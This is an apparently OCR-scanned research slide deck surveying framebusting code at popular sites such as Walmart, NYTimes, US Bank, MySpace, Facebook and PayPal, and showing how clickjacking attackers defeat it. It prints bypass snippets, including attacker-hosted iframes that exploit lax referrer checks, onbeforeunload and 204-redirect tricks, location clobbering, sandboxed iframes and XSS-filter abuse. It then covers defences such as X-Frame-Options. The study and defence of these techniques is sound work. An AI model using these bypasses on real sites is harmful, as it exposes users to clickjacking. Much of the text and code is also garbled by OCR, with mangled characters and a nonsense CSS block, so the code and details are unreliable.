Framebusting in the Wild 


A survey of framebusting code used at popular sites 


Gustav Rydstedt, Elie Burzstein, 
Dan Boneh, Collin Jackson 


What is frame busting? 


What is frame busting? 


e HTML allows for any site to frame any URL with an 
(internal frame) 


Ignored by most browsers 


What is frame busting? 


rame busting are techniques for 
reventing framing by the framed site. 
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What is framebusting? 


Common frame busting code is made 
Up ol: 

e a conditional statement 

e a counter action 


if (top != self) { 
top.location = self.location; 


} 


Why frame busting? 


Primary: Clickjacking 


Jeremiah Grossman and Robert Hansen, 2008 


BEST GAME EVER! 


twitter 


Clickjacking 2.0 


(Paul Stone, BHEU '10) 
Utilizing drag and drop: 


Grab data off the page 
(including source code, form data) 


Get data info the page 
(forms etc.) 


Fingerprint individual objects in the framed 
page 


Survey 


e Idea: Grab frame "EAT from 
and 


Analyze code. 


. Used semi-automated crawler based 
on HTMLUnit. 


e Manual work to trace through 
obfuscated and packed code. 


Obfuscation/Packing 
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<genda casted sada seven duets 


Top 10 60% 


Top 100 37% 
Top 500 14% 


if (top != self) 
if (top.location != self.location) 
if (top location != location) 
if (oarent.frames.length > O) 


if (window != top) 


if (window.top !== window self) 
if (window.self != window.top) 
if (parent && parent != window) 


if (parent && 
parent.frames && 
parent.frames.length>0) 


if((self. parent&& 
| (self .oarent===self))&& 
(self.parent.frames.length!=0)) 


top. location = self.location 
top.location.href = document.location.href 
top.location.href = self.location.href 
top.location.replace(self.location) 
top.location.href = window.location.href 
top.location.replace(document.location) 
top.location.href = window.location.href 
top.location.href = "URL" 
document.write (’’) 
top.location = location 
top.location.replace(document.location) 
top.location.replace('URL') 
top.location.href = document.location 
top.location.replace(window.location.href) 
top.location.href = location.href 
self.parent.location = document.location 
parent.location.href = self.document.location 
top.location.href = self.location 
top.location = window.location 
top.location.replace(window.location.pathname) 
window.top.location = window.self.location 


setlimeout(function()4document.body.innerHTML="";),1); 


window .self.onload = function(evt)(document.body.innerHTML-"':) 


var url = window location.href; top.location.replace (url) 


All frame busting code we found 


was broken. 


Let's check out some code. 


Courtesy of 


if (top.location != location) ( 
if(document.referrer && 
document.referrer.indexOft ("walmart.com") == -1) 


{ 


top.location.replace(document.location.href); 


Walmart 


Save money. Live better. 


Error in Referrer Checking 


ist | 


From http://www.attacker.com/walmart.com.html 
<iframe src= “htitp://www.walmart.com”5 
Limit use of indexOf()... 


Savoie Che New ork Gimes 


if (window.self I5 window.top && 
Idocument.reterrer.match( 
/httes?:\/\/[A2\/]+\.nytimes\.com\//)) 


{ 


self.location = top.location: 


| 


Error in Referrer Checking 


i Che New ork Tim 


From hffp://www.attacker.com/a.htmleb= 
<iframe src="htto://www.nytimes.com’'> 
Anchor your regular expressions. 


Courtesy of "Sbank. 
| 


if (self != top) { 


var domain = getDomain 
(document.referrer); 


var okDomains = /usbank | localhost | usonet/; 


var matchDomain = domain.search 
(okDomains); 


ii (matchDomain == -1) { 
//frame bust 


| 


Error in Referrer Checking 


| 
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From http://usbank.attacker.com/ 
<iframe src="http://www.usbank.com'> 
Don't make your regular expressions too lax. 


Strategic Relationship? 


Norweigan State House Bank 
Nnito://www.h en.no 


Strategic Relationship? 


http://www. .Org 


= 


Courtesy of Myspace 


a place for freedom 


try{ 
A=!top.location.href 
}catch(B){} 


A=A&& 


!(document.referrer.match(/Ahttps?:\/\/[-az09.| 
*\ google\.(co\. | com\.})? [a-z] +\/imgres/i}) && 


!(document.referrer.match(/Ahttps?:\/\/([A\/]*\.) ? 
(myspace\.com | 


myspace\.cn | 
simsidekick\.com | 
levisawards\.com | 
digg\.com)\//i)); 


if(A){ //Framebust } 


eople might not 
frame bust 


OO le ace of base myspace Search images 


ui os ia) awe 
890 x 540 - 119k - jpg - custom.mubito.con/.../myspace/myspace_logo.jpg 
Image may be subject to copyright. 
Below is the image at: 
= 


Click Her; 


"datals a 


a Jennifer Lopez b. Angelina Jolie c. Jessica Alba 


a myspace. 


Home Browse People Find Friends Local Music Video Games More v 


Sparks From A Fire Live 


by Ace Of Base 


a NING 


"EOF BASE 
El OF FORTUNEŻ by Ace Of Base 


Love 2009 
Pics Videos Playlists | ERZE 27,295 pl 


Wheel of Fortune 2009 79,113 pl 


Google Images framebust. 


Referrer = Funky Stuff 


Many attacks on referrer: washing/changing 
Open redirect referrer changer 
HTTPS->HTTP washing 


Can be hard to get regular expression right 
(apparently) 


"Friends" cannot be trusted 


Facebook Dark Layer 


My Account 


| Networks | Notifications | Mobile Language Payments | Facebook Ads 


Username 


Password 


Linked Accounts 


Privacy 


Deactivate Account 


Courtesy of Facebook 


Facebook deploys an exotic variant: 


if (top != self) { 


try { 
if (top.location.hostname.indexOf("apps") >= 0) throw DPA 
} catch (e) £ 


window.document.write ("<div style= 
'background: black; 
opacity: 0.5; filter: aloha(opacity = 50); 
position: absolute; top: Opx; left: Opx; 
width: 9999px; height: 9999px; 
z-index: 1000001' 
onClick='top.location.href=window.location.href'> 
</div>"); 


Facebook - Ray of Light! 


All Facebook content is centered! We can 
push the content into the ray of light 


<iframe width=" " height="2500px" 
src ="hfip://facebook.com > 


<script> 
window.scrollTo(10200, O ) ; 
</script> 


Facebook - Ray of Light! 


facebook Find People and More 


My Account 


Name 
Your real name. 


ua = 


Your username 


Set your email contact information. 


Password 
What you use to log in. 


Linked Accounts 
Use other accounts to log in. 


Privacy 


Control what information you share. 


Deactivate Account 


Facebook © 2010 English (US) 


wor: bie: ) int 
„ font: Zem/24px 
sparent; margin: 0 em Jem; ) /* co 
w */ f* top line of f: alp): fixed positioning è 
0; top: Sem; left ; width: 140%; max-width: 
axchei 1 background: black; border-botto 
TML pars mbinator, icking 
p” r uid match R too, thus 
+ p { margin-top: Żem; 
attribute selectors, f 
ck 2em; border-style 
{ float: right, 


ari 


ne of face: width an 
and: red uri(ćata 
P4%2F58BAATW2FA(OJYNErAAAAAEJF TkSvQ 
class selectors headache */ .two.error.two 
"shouldn't match */ (class=second two] 
$ IDENTs or STRINGS) */ 
maan ara ane! 
ay ar 
yellow b 
ght: Żem, 
>ottom; ) £ Sem; haig 
ng inline (height/width J #eyes-a object obje 
d: ur(data: image/p. #OKGgCAAAANSUN 
ROQA%2FWDW2FAPRZBGY. UIEQVR42mP4%2F58BCV 
float: left; width: 10am: height: 2em; background: fixed url 
D9 LipzAKSMAILLIWSLERAMKABupgeRAAAABMILAOQA% 27 
AARARSUVORKSCYII%3D); border-left: solid Lem bi 
Post */ #eyes-c { display: block; back 
cause it is a block */ /* 


fourth and fifth 


al-align 


round: r 
ines six to nine 


0; min-height: 80%; height 


Courtesy of many 


if(top. location != self.location) £ 
parent.location = self.location; 


} 


Double Framing! 
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KapTbi Mapker Host 


Descendent Policy 


e Introduced in 
(Adam Barth, Collin Jackson, and John Mitchell. 2009) 
Descendant Policy 


A frame can navigate only it's decedents. 


top.location = self.location is always okay. 


Location Clobbering 


if (top.location != self.location) { 
top.location = self.location; 


can be changed or 
disabled this code is 


But our trusted browser would never let 
such atrocities happen... 


Location Clobbering 


var location = “clobbered": 


window. defineSetter (location", function(){}); 


top.location is now ©) 


http://code.google.com/p/ browsersec/wiki/Part2#Arbitrary page mashups (UI redressing) 


Asking Nicely 


e User can any 
made by 
framebusting code. 


e Attacker just needs fo ask... 


<script> 
window.onbeforeunload = function() { 
return "Do you want to leave PayPal?"; 
} 
</script> 
<iframe src="hfip://www.paypal.com > 


Asking N 


4 ce R EJ  nttp://www.stanford.edu/-rydstedt/c Confirm 


tanford Online - 12... Are you sure you want to navigate away from this page? 


|-| Ask Nicely - Defeating Framebusti... 
Do you want to leave PayPal? 


Press OK to continue, or Cancel to stay on the current 
page. 


Cancel OK 


Home 


How PayPal Works 


Account login ©) 


Get to Know PayPa 


Asking Nicely 


e Actually, we don't have to ask nicely 
at all. Most browser allows to 


var prevent bust = 0 
window.onbeforeunload = function() (kill busit: } 
setinterval(function() { 
if (kill bust > O) £ 
kill bust -= 2; 
window.top.location = ‘htto://no-content-204.com' 
} 
¥ 1); 
<iframe src="hfip://www.viclim.com > 


http://coderrr.wordpress.com/2009/02/13/preventing-frame-busting-and-click-jacking-ui-redressing 


Restricted zones 


<iframe security="restricted” src="http://www.victim.com'> 


Javascript and Cookies disabled 


<iframe sandbox src="hfip://www.viclim.com'> 


Javascript disabled (cookies still there) 


designMode = on (Paul Stone BHEU'10) 
Javascript disabled (more cookies) 


Reflective XSS filters 


e Internet Explorer 8 introduced reflective 
XSS filters: 


http://www.victim.come¢var=<script> alert ( 'xss') 


If appears in the rendered 
page, the filter will replace it with 


Reflective XSS filters 


Can be used to target frame busting 
(Eduardo Vela '09) 


<script> if(top. location != self.location) //framebust </ 
script> 


http://www.victim.com2varzsscript? if (top 


<scHpi> If(top. location != self.location) 


Chrome's XSS auditor, same problem. 


Is There any hope? 
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Well, sort of... 


X-Frames-Options (lE8} 


HTTP header sent on responses 
Two possible values: and 


On DENY, will not render in framed 
context. 

On SAMEORIGIN, only render if top 
frame is same origin as page giving 
directive. 


X-Frames-Options 


. Good adoption by browsers (all but 
Firefox, coming in 3.7) 


e Poor adoption by sites (4 out of top 
10,000, survey by sans.org) 


e Some limitations: per-page policy, no 
whitelisting, and proxy problems. 


Content Security Policy (FF) 


Also a HIIP-Header. 


Allows the site to specific restrictions/ 
abilities. 


The directive can 
specifiy allowed framers. 


Still in beta, coming in Firefox 3.7 


Best for now 
(but still not good) 


<style>html { visibility: hidden }</style> 
<script> 
if (self == top) { 


document.documentElement.style.visibility = 
Visible; 
) else { 
top.location = self.location; 


} 


</script> 


... G little bit more. 


These sites (among others) do framembusting... 


a TAE 


... G little bit more. 


... but do these? 


Facebook 


MSN 


GMail 
Baidu 
Twitter 
MegaVideo 
Tube8 
PayPal 
USBank 
First Interstate Bank 
NewEgg 
MetaCafe 
RenRen 
MySpace 
VKontakte 


WellsFargo 
NyTimes 


E-Zine Articles 


No, they generally don’t... 


http://m.facebook.com/ 


htip://home.mobile.msn.com/ 


http://m.gmail.com 
http://m.baidu.com 
hfip://mobile.twitter.com 
htip://mobile.megavideo.com/ 
http://m.tube8.com 
http://mobile.paypal.com 
http://mobile.usbank.com 
http://firstinterstate.mobi 
hitp://m.newegg.com/ 
http://m.metacafe.com/ 
http://m.renren.com/ 


http://m.myspace.com 


http://pda.vkontakte.ru/ 
htips://m.wf.com/ 


htip://m.nytimes.com 


http://m.ezinearticles.com 


NO 


NO 
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NO 
NO 


Redirect 


Redirect 


Summary 


All framebusting code out there can 
be broken across browsers in several 
different ways 


Defenses are on the way, but not yet 
widely adopted 


Relying on referrer is difficult 
If JS is disabled, don't render the page. 
Framebust your mobile sites! 


Questions? 


rydstedt@stanford.edu 


